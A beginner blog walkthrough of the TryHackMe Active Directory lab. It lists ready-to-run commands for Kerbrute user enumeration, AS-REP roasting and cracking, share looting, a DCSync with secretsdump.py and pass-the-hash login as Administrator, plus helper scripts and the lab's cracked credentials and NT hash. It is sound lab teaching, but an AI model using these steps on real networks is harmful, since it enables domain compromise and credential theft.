Active Directory enumeration and exploitation for beginners

Doozy
Jan 27, 2023


#beginners #activedirectory #AD #enumeration #exploitation

As you may be aware, the buzz lately (well, for a number of years now) has been about AD.

Active Directory enumeration and exploitation is a fantastic skill set to possess.

Below are detailed steps for enumerating AD and then exploiting what you find. Always remember: enum, enum, enum at every stage, and again every time you obtain a new set of credentials. There is a quick guide at the bottom of the page if you just want the notes.

Let's begin.

1. NMAP scan

We are going to start with an nmap scan: -sV for service versions, -Pn to skip host discovery (Windows hosts often do not answer ping), and -A for OS detection, default scripts and traceroute.

nmap 10.10.61.211 -sV -Pn -A

Let's go through the results:

  • Port 53 (DNS) is open. A domain controller normally hosts the domain's DNS, so this is a strong hint that we are looking at AD.
  • Microsoft IIS is running, so there is a web application to enumerate; IIS web.config files and application source sometimes contain credentials.
  • Port 88 (Kerberos) means we can enumerate valid usernames: the KDC answers differently for a principal it knows and one it does not.
  • Port 389 (LDAP): we can potentially query it with LDAP tools such as ldapsearch.
  • Ports 135, 139 and 445 are the RPC and SMB ports, perfect for pulling information with enum4linux, smbclient, smbmap and more.
  • Very importantly, ports 3389 and 5985 are also open. RDP is potentially usable (if our user ends up in the Remote Desktop Users group), and 5985 is WinRM over HTTP, which tools like evil-winrm connect to.

We have also gathered the following information:

  • we know the domain: spookysec.local (nmap prints it in the LDAP banner)
  • so let's add it to /etc/hosts first
  • this matters because the Kerberos and LDAP tooling addresses the DC by domain name; if that name does not resolve to 10.10.61.211, those tools fail or return nothing useful.

2. Edit /etc/hosts

sudo nano /etc/hosts

Add a line mapping the DC's IP to the domain name: 10.10.61.211 followed by spookysec.local (and the DC's hostname too, once you learn it).
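As an added example (not part of the original write-up), the shell functions below pull the domain out of nmap's LDAP banner, check that the open ports look like a domain controller, and produce the /etc/hosts line for step 2. The nmap excerpt is constructed to resemble -sV -A output against a DC; only the IP 10.10.61.211 and the domain spookysec.local come from the write-up.

```shell
#!/bin/sh
# Added example, not from the original write-up. SAMPLE_NMAP is a constructed
# excerpt modelled on `nmap -sV -A` output against a domain controller; only
# the IP 10.10.61.211 and the domain spookysec.local come from the write-up.
SAMPLE_NMAP='PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPd 2.0 (SSDP/UPnP)'

# Open TCP port numbers, one per line.
open_ports() {
    printf '%s\n' "$1" | awk '$2 == "open" { split($1, p, "/"); print p[1] }'
}

# Succeed only if the port set carries the DC signature: Kerberos (88),
# LDAP (389) and SMB (445) all open.
looks_like_dc() {
    ports=$(open_ports "$1" | tr '\n' ' ')
    for want in 88 389 445; do
        case " $ports " in
            *" $want "*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Domain from the LDAP banner "(Domain: spookysec.local0., Site: ...)".
# nmap's LDAP probe commonly prints the DNS name with a stray "0." on the
# end, so that suffix (and any trailing dot) is stripped. Cross-check the
# result against what enum4linux/smbmap report: a real name that ends in
# "0" would be mangled by this rule.
nmap_domain() {
    printf '%s\n' "$1" \
        | sed -n 's/.*(Domain: \([^,]*\),.*/\1/p' \
        | head -n 1 \
        | sed -e 's/0\.$//' -e 's/\.$//'
}

# The /etc/hosts line for step 2: "<ip> <domain>". Fails if no domain found.
hosts_entry() {
    dom=$(nmap_domain "$2") || return 1
    [ -n "$dom" ] || return 1
    printf '%s %s\n' "$1" "$dom"
}

if looks_like_dc "$SAMPLE_NMAP"; then
    hosts_entry 10.10.61.211 "$SAMPLE_NMAP"
fi
```

Against real output you would run the scan with -oN, feed that file to these functions, and append the result with `hosts_entry 10.10.61.211 "$(cat scan.txt)" | sudo tee -a /etc/hosts`.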

3. Enumeration

Our next step is to gather as much information as possible. Ideally we are looking for credentials (a long shot, I know), but finding usernames, including the naming format the domain uses, is very achievable.

3a. Website Enumeration

Steps:

  • check out the website and snoop around
  • check out the source code; credentials are sometimes left in by mistake
  • run a directory scan; you may need to try different wordlists and to specify extensions (e.g. php, txt)

3b. SMB/RPC Enumeration

smbmap:

smbmap -H 10.10.61.211

smbclient:

smbclient -L \\\\10.10.61.211\\

enum4linux:

enum4linux 10.10.61.211
  • the output here (users, groups, shares, password policy) is very useful, so make a note of it.

4. Enum users / password spray

At this stage one of two things will happen:

  • you either have some usernames (found in earlier stages)
  • or you will be using a username list to find them

As you can imagine the latter is not ideal if you intend to password spray, as lockout policies may stop you in your tracks; check the password policy enum4linux reported (lockout threshold and observation window) before spraying. Kerberos username enumeration, on the other hand, only asks the KDC whether a principal exists and does not increment the account's bad-password count, so it is safe against lockout.

Nevertheless, let's progress. For this I am using a modified list provided by THM.

The tool we will use is called Kerbrute.

Just to note: you can also use crackmapexec and other tools for this stage.

4a. Kerbrute

./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.61.211 /tmp/userlist.txt

What's going on in the command:

  • userenum is the subcommand (kerbrute also has passwordspray and bruteuser)
  • -d is the domain
  • --dc is the DC's IP address (the domain name works too, now that /etc/hosts resolves it)
  • and finally the username list

A few things should immediately jump out at us:

  • svc-admin is a valid user, and kerbrute also dumped an AS-REP hash for it, which it does when an account has Kerberos pre-authentication disabled
  • backup is another valid username
  • we can attempt to crack this hash using John; sadly I had no luck
  • the main thing is we have some valid usernames, including the actual format of the names used.

5. Next stage — abuse a feature within Kerberos

Now that we have valid usernames we could password spray with crackmapexec or a similar tool, but a better next step is a script from Impacket called GetNPUsers.py.

Why: (source TryHackMe.com)

  • we want to abuse a feature within Kerberos with an attack method called ASREPRoasting

What is that: (source TryHackMe.com)

  • it is when a user account has the privilege “Does not require Pre-Authentication” set
  • meaning — that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account. Thus meaning we can get the user hash!

In AD terms that is the DONT_REQ_PREAUTH flag in the account's userAccountControl attribute. Without pre-authentication the KDC hands back an AS-REP whose encrypted part is protected with a key derived from the user's password, so anyone who can name the account can request that blob and crack it offline.

As it stands we have svc-admin and backup plus other usernames.

6. GetNPUsers.py

python3 GetNPUsers.py spookysec.local/ -dc-ip 10.10.61.211 -usersfile /tmp/users_list_example.txt -format john -outputfile /tmp/crackme.txt
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -outputfile crackme.txt
  • the first form tries every name in the file; the second targets one account, and -no-pass stops the script prompting for a password we do not have. Pay attention to the format of the command, as it can be funny and not run as intended. I struggled with using -dc hostname.
  • svc-admin does have pre-authentication disabled, so its AS-REP hash is written to the output file; let's check it out
  • let's use john to crack this hash

7. JtR

john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt
  • brilliant, we have a password! (john recognises the format from the $krb5asrep$ prefix, so no --format is needed)
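The triage below is an added example for steps 5 to 7; it is not from the original write-up and not impacket code. It reads GetNPUsers.py output and separates the accounts that gave up an AS-REP hash from the valid accounts that still require pre-authentication (not roastable, but confirmed to exist), counts names the KDC did not know, and picks the hashcat mode from the etype in the hash. The sample output is constructed, modelled on impacket's messages; the hash body is placeholder hex, not a real AS-REP.

```shell
#!/bin/sh
# Added example, not from the original write-up or from impacket. SAMPLE_OUT
# is a constructed excerpt modelled on GetNPUsers.py messages; the hash body
# is placeholder hex, not a real AS-REP.
SAMPLE_OUT=$(cat <<'EOF'
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
EOF
)

# Only the hash lines, i.e. what belongs in the file handed to john/hashcat.
roastable_hashes() {
    printf '%s\n' "$1" | grep '^\$krb5asrep\$'
}

# Account names with pre-authentication disabled, taken from the hash lines.
# Handles both the hashcat form ($krb5asrep$23$user@REALM:...) and the john
# form ($krb5asrep$user@REALM:...), which omits the etype field.
roastable_users() {
    roastable_hashes "$1" \
        | sed -n 's/^\$krb5asrep\$\([0-9][0-9]*\$\)\{0,1\}\([^@]*\)@.*/\2/p'
}

# Valid accounts that still require pre-auth: no hash, but the name exists,
# which is worth keeping for a later password spray.
preauth_required_users() {
    printf '%s\n' "$1" \
        | sed -n "s/^\[-\] User \(.*\) doesn't have UF_DONT_REQUIRE_PREAUTH set\$/\1/p"
}

# Number of names the KDC did not recognise at all (bad guesses in the list).
unknown_principals() {
    printf '%s\n' "$1" | grep -c 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
}

# hashcat mode for the etype in a hashcat-format hash line. etype 23 (RC4,
# which GetNPUsers.py requests) is mode 18200; this example knows no other
# etype and prints nothing for john-format lines, which carry no etype.
hashcat_mode_for() {
    etype=$(printf '%s\n' "$1" \
        | sed -n 's/^\$krb5asrep\$\([0-9][0-9]*\)\$.*/\1/p' | head -n 1)
    case "$etype" in
        23) printf '18200\n' ;;
        *)  return 1 ;;
    esac
}

printf 'roastable:         %s\n' "$(roastable_users "$SAMPLE_OUT")"
printf 'pre-auth required: %s\n' "$(preauth_required_users "$SAMPLE_OUT")"
printf 'unknown names:     %s\n' "$(unknown_principals "$SAMPLE_OUT")"
printf 'hashcat mode:      %s\n' "$(hashcat_mode_for "$SAMPLE_OUT")"
```

Run it as `./triage.sh` after replacing SAMPLE_OUT with the captured output of GetNPUsers.py; `roastable_hashes` is what to redirect into the file given to john in step 7.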

8. Enumeration! (again)

Remember what I said at the start: any time we get valid credentials we go back to square one.

Square one is:

  • smbclient
  • smbmap
  • rdp / winrm attempts
  • login portals? Let's try these credentials everywhere they might work

smbmap:

smbmap -u svc-admin -p management2005 -H 10.10.61.211

smbclient:

smbclient -L \\\\10.10.61.211\\ --user svc-admin 
smbclient -L spookysec.local --user svc-admin

Instantly, the backup share should stick out like a sore thumb.

9. Enumerating further — for some credentials

Let's check it out; again you can use smbmap, smbclient and even crackmapexec (CME).

If you intend to use smbclient, you need to remove the -L (that is for listing shares) and name the share instead, as below:

smbclient \\\\spookysec.local\\backup --user svc-admin
smbclient \\\\10.10.61.211\\backup --user svc-admin
  • if you encounter an error like “Not enough '\' characters in service” you have not put in enough backslashes: the shell consumes half of them, so each backslash of the UNC path must be doubled as shown above. Writing the path with forward slashes (//host/share) avoids the escaping entirely.

In the backup share we find a file whose contents look base64 encoded, so let's decode it:

echo YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw | base64 -d

It decodes to user@domain:password, giving us credentials for the backup account.
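As an added example (not part of the original write-up), the functions below validate the blob before decoding it, split the decoded user@domain:password on the first colon so an awkward password survives, and build the target string Impacket tools accept. BLOB is the string shown above; everything else is derived from it, and the test input with a colon in the password is constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up. BLOB is the base64 string
# found in the backup share; all values below are derived from decoding it.
BLOB='YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw'

# Decode only well-formed base64 (alphabet and length check first), so a
# file that merely looks encoded does not yield silent garbage.
b64_decode() {
    case "$1" in
        ''|*[!A-Za-z0-9+/=]*) return 1 ;;
    esac
    [ $(( ${#1} % 4 )) -eq 0 ] || return 1
    printf '%s' "$1" | base64 -d
}

# The decoded text is "user@domain:password". Split on the FIRST ':' so a
# password containing ':' or '@' stays intact; the user part has no ':'.
cred_user()   { s=$(b64_decode "$1") || return 1; u=${s%%:*}; printf '%s\n' "${u%@*}"; }
cred_domain() { s=$(b64_decode "$1") || return 1; u=${s%%:*}; printf '%s\n' "${u#*@}"; }
cred_pass()   { s=$(b64_decode "$1") || return 1; printf '%s\n' "${s#*:}"; }

# Impacket target syntax: domain/user[:password]@host. Putting the password
# on the command line exposes it in `ps` and shell history, which is why the
# write-up leaves it out and lets secretsdump.py prompt for it instead.
impacket_target_nopass() {
    printf '%s/%s@%s\n' "$(cred_domain "$1")" "$(cred_user "$1")" "$2"
}
impacket_target() {
    printf '%s/%s:%s@%s\n' "$(cred_domain "$1")" "$(cred_user "$1")" "$(cred_pass "$1")" "$2"
}

# Show what we learned without echoing the password to the terminal.
printf 'user=%s domain=%s\n' "$(cred_user "$BLOB")" "$(cred_domain "$BLOB")"
impacket_target_nopass "$BLOB" 10.10.61.211
```

The no-password target is the form to pass to secretsdump.py in step 10a; the full form exists for tools that insist on it, at the cost of leaving the password in process listings.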

10. Privileged

The name suggests this account is used for backups, and an account that backs up a domain controller typically needs to read the directory database. Whether it really has elevated rights is something to test rather than presume.

Since we have the credentials, we can use secretsdump.py (from Impacket) to try to pull the password hashes of every domain account, including the administrator account, which has full rights over everything on the domain.

10a. Secretsdump.py

is a script used to extract credentials and secrets from a system. With -just-dc it never touches the DC's disk: it asks the DC to replicate its NTDS secrets over the DRSUAPI protocol (the DCSync technique), which only works if the account we use holds directory replication rights. That is exactly what the backup account turns out to have here.

sudo python3 secretsdump.py -just-dc backup@spookysec.local
  • provide the password when prompted (sudo is not actually needed; the script only needs network access to the DC)

WOOHOO!!

we have the hashes. Each line is user:RID:LM hash:NT hash:::, and the part we need is the fourth field, the NT hash. The LM field will usually read aad3b435b51404eeaad3b435b51404ee, the fixed value that means no LM hash is stored.

What can we do with this:

  • something called Pass the Hash (PtH): NTLM authentication only ever proves knowledge of the NT hash, never of the password itself, so we can hand the hash straight to a tool and authenticate as that user, as you will see next

11. Pass the Hash (PtH)

How does it all work? Let's see, using Evil-winrm:

evil-winrm -i 10.10.61.211 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
  • notice we have not provided a password but the NT hash of the Administrator user

And there we have it! We are now Administrator.

A quick guide:

  1. nmap scan: get the domain name and the service list
  2. add the domain to /etc/hosts
  3. start enumeration: website, smb, rpc, ldap, dns
  4. validate usernames with kerbrute (or a careful password spray, minding the lockout policy)
  5. with valid names, ASREPRoast using the GetNPUsers.py script
  6. use JtR to crack the hash you find
  7. back to square one: enumerate again with the credentials you have, logging in via smbclient, smbmap etc. to read the shares
  8. look for credentials of more privileged accounts in what you find, and if you get some
  9. run secretsdump.py with the new credentials; an account with replication rights can pull the hashes of every domain account, including Administrator
  10. with the Administrator NT hash, log in via evil-winrm using Pass the Hash (RDP needs a password unless Restricted Admin mode is enabled on the target)

Sources and credits:

huge thanks to TryHackMe on the brilliant Attacktive Directory room


Doozy

Shopkeeper turned hacker. Love learning! Check out my YouTube channel: https://tinyurl.com/doozyNS and my website at: https://navkang.github.io/Doozy/